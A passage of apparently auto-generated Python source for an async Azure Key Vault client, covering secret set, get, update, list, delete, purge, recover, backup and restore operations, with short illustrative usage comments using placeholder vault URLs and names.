:param key_name: The name of the deleted key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.recover_deleted_key.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'key-name': self._serialize.url("key_name", key_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
recover_deleted_key.metadata = {'url': '/deletedkeys/{key-name}/recover'} # type: ignore
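# Illustrative sketch (not part of the generated client): for a soft-deleted key the two
# operations above are the alternatives - recover it back under /keys, or purge it
# permanently. The vault URL and key names are placeholders.
#
#     recovered = await client.recover_deleted_key(vault_url, "my-key")   # back under /keys
#     # ...or, irreversibly:
#     await client.purge_deleted_key(vault_url, "other-key")              # returns None on 204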
async def set_secret(
self,
vault_base_url: str,
secret_name: str,
parameters: "_models.SecretSetParameters",
**kwargs: Any
) -> "_models.SecretBundle":
"""Sets a secret in a specified key vault.
The SET operation adds a secret to the Azure Key Vault. If the named secret already exists,
Azure Key Vault creates a new version of that secret. This operation requires the secrets/set
permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the secret.
:type secret_name: str
:param parameters: The parameters for setting the secret.
:type parameters: ~azure.keyvault.v2016_10_01.models.SecretSetParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecretBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SecretBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecretBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.set_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str', pattern=r'^[0-9a-zA-Z-]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'SecretSetParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SecretBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
set_secret.metadata = {'url': '/secrets/{secret-name}'} # type: ignore
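# Illustrative sketch (not part of the generated client): creating a secret, or a new
# version of an existing one. SecretSetParameters is assumed to take the secret ``value``
# plus optional ``content_type`` and ``tags`` per the 2016-10-01 models; the vault URL and
# secret name are placeholders.
#
#     bundle = await client.set_secret(
#         vault_url, "db-password",
#         _models.SecretSetParameters(value="s3cr3t", content_type="text/plain"),
#     )
#     print(bundle.id)  # full secret identifier, including the newly created version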
async def delete_secret(
self,
vault_base_url: str,
secret_name: str,
**kwargs: Any
) -> "_models.DeletedSecretBundle":
"""Deletes a secret from a specified key vault.
The DELETE operation applies to any secret stored in Azure Key Vault. DELETE cannot be applied
to an individual version of a secret. This operation requires the secrets/delete permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the secret.
:type secret_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedSecretBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.DeletedSecretBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedSecretBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.delete_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedSecretBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
delete_secret.metadata = {'url': '/secrets/{secret-name}'} # type: ignore
async def update_secret(
self,
vault_base_url: str,
secret_name: str,
secret_version: str,
parameters: "_models.SecretUpdateParameters",
**kwargs: Any
) -> "_models.SecretBundle":
"""Updates the attributes associated with a specified secret in a given key vault.
The UPDATE operation changes specified attributes of an existing stored secret. Attributes that
are not specified in the request are left unchanged. The value of a secret itself cannot be
changed. This operation requires the secrets/set permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the secret.
:type secret_name: str
:param secret_version: The version of the secret.
:type secret_version: str
:param parameters: The parameters for update secret operation.
:type parameters: ~azure.keyvault.v2016_10_01.models.SecretUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecretBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SecretBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecretBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
'secret-version': self._serialize.url("secret_version", secret_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'SecretUpdateParameters')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SecretBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_secret.metadata = {'url': '/secrets/{secret-name}/{secret-version}'} # type: ignore
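# Illustrative sketch (not part of the generated client): updating metadata on an existing
# secret version; the value itself cannot be changed, as the docstring notes. The
# SecretUpdateParameters fields shown (``content_type``, ``tags``) are assumptions per the
# 2016-10-01 models.
#
#     updated = await client.update_secret(
#         vault_url, "db-password", secret_version,
#         _models.SecretUpdateParameters(content_type="text/plain", tags={"env": "prod"}),
#     )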
async def get_secret(
self,
vault_base_url: str,
secret_name: str,
secret_version: str,
**kwargs: Any
) -> "_models.SecretBundle":
"""Get a specified secret from a given key vault.
The GET operation is applicable to any secret stored in Azure Key Vault. This operation
requires the secrets/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the secret.
:type secret_name: str
:param secret_version: The version of the secret.
:type secret_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecretBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SecretBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecretBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
'secret-version': self._serialize.url("secret_version", secret_version, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SecretBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_secret.metadata = {'url': '/secrets/{secret-name}/{secret-version}'} # type: ignore
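# Illustrative sketch (not part of the generated client): reading a secret. Passing an
# empty string for ``secret_version`` is the service convention for "latest version";
# treat that, and the names below, as assumptions rather than facts stated in this file.
#
#     bundle = await client.get_secret(vault_url, "db-password", "")
#     print(bundle.value)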
def get_secrets(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.SecretListResult"]:
"""List secrets in a specified key vault.
The Get Secrets operation is applicable to the entire vault. However, only the base secret
identifier and its attributes are provided in the response. Individual secret versions are not
listed in the response. This operation requires the secrets/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified, the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SecretListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.SecretListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecretListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_secrets.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('SecretListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_secrets.metadata = {'url': '/secrets'} # type: ignore
def get_secret_versions(
self,
vault_base_url: str,
secret_name: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.SecretListResult"]:
"""List all versions of the specified secret.
The full secret identifier and attributes are provided in the response. No values are returned
for the secrets. This operation requires the secrets/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the secret.
:type secret_name: str
:param maxresults: Maximum number of results to return in a page. If not specified, the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SecretListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.SecretListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecretListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_secret_versions.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('SecretListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_secret_versions.metadata = {'url': '/secrets/{secret-name}/versions'} # type: ignore
def get_deleted_secrets(
self,
vault_base_url: str,
maxresults: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.DeletedSecretListResult"]:
"""Lists deleted secrets for the specified vault.
The Get Deleted Secrets operation returns the secrets that have been deleted for a vault
enabled for soft-delete. This operation requires the secrets/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified, the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DeletedSecretListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.keyvault.v2016_10_01.models.DeletedSecretListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedSecretListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_deleted_secrets.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', maximum=25, minimum=1)
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('DeletedSecretListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_deleted_secrets.metadata = {'url': '/deletedsecrets'} # type: ignore
async def get_deleted_secret(
self,
vault_base_url: str,
secret_name: str,
**kwargs: Any
) -> "_models.DeletedSecretBundle":
"""Gets the specified deleted secret.
The Get Deleted Secret operation returns the specified deleted secret along with its
attributes. This operation requires the secrets/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the secret.
:type secret_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedSecretBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.DeletedSecretBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedSecretBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.get_deleted_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedSecretBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_deleted_secret.metadata = {'url': '/deletedsecrets/{secret-name}'} # type: ignore
async def purge_deleted_secret(
self,
vault_base_url: str,
secret_name: str,
**kwargs: Any
) -> None:
"""Permanently deletes the specified secret.
The purge deleted secret operation removes the secret permanently, without the possibility of
recovery. This operation can only be performed on a soft-delete enabled vault. This operation
requires the secrets/purge permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the secret.
:type secret_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.purge_deleted_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
purge_deleted_secret.metadata = {'url': '/deletedsecrets/{secret-name}'} # type: ignore
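# Hedged example (assumptions: `client` is an authenticated instance of this class and
# the vault has soft-delete enabled). Purging returns None on HTTP 204.
#
#     async def purge(client):
#         await client.purge_deleted_secret(
#             "https://myvault.vault.azure.net", "my-secret")
#         # nothing is returned; an HttpResponseError is raised on failure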
async def recover_deleted_secret(
self,
vault_base_url: str,
secret_name: str,
**kwargs: Any
) -> "_models.SecretBundle":
"""Recovers the deleted secret to the latest version.
Recovers the deleted secret in the specified vault. This operation can only be performed on a
soft-delete enabled vault. This operation requires the secrets/recover permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the deleted secret.
:type secret_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecretBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SecretBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecretBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.recover_deleted_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SecretBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
recover_deleted_secret.metadata = {'url': '/deletedsecrets/{secret-name}/recover'} # type: ignore
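# Illustrative sketch only (assumes `client` is an authenticated instance of this class):
# recovery returns the restored SecretBundle, whose `id` is the new active secret URI.
#
#     async def recover(client):
#         bundle = await client.recover_deleted_secret(
#             "https://myvault.vault.azure.net", "my-secret")
#         return bundle.id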
async def backup_secret(
self,
vault_base_url: str,
secret_name: str,
**kwargs: Any
) -> "_models.BackupSecretResult":
"""Backs up the specified secret.
Requests that a backup of the specified secret be downloaded to the client. All versions of the
secret will be downloaded. This operation requires the secrets/backup permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param secret_name: The name of the secret.
:type secret_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: BackupSecretResult, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.BackupSecretResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.BackupSecretResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
accept = "application/json"
# Construct URL
url = self.backup_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
'secret-name': self._serialize.url("secret_name", secret_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('BackupSecretResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
backup_secret.metadata = {'url': '/secrets/{secret-name}/backup'} # type: ignore
async def restore_secret(
self,
vault_base_url: str,
parameters: "_models.SecretRestoreParameters",
**kwargs: Any
) -> "_models.SecretBundle":
"""Restores a backed up secret to a vault.
Restores a backed up secret, and all its versions, to a vault. This operation requires the
secrets/restore permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param parameters: The parameters to restore the secret.
:type parameters: ~azure.keyvault.v2016_10_01.models.SecretRestoreParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SecretBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v2016_10_01.models.SecretBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SecretBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.restore_secret.metadata['url'] # type: ignore
path_format_arguments = {
'vaultBaseUrl': self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'SecretRestoreParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('SecretBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
restore_secret.metadata = {'url': '/secrets/restore'} # type: ignore
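# Hedged round-trip sketch for backup_secret/restore_secret (assumptions: `client` is an
# authenticated instance of this class; SecretRestoreParameters and its
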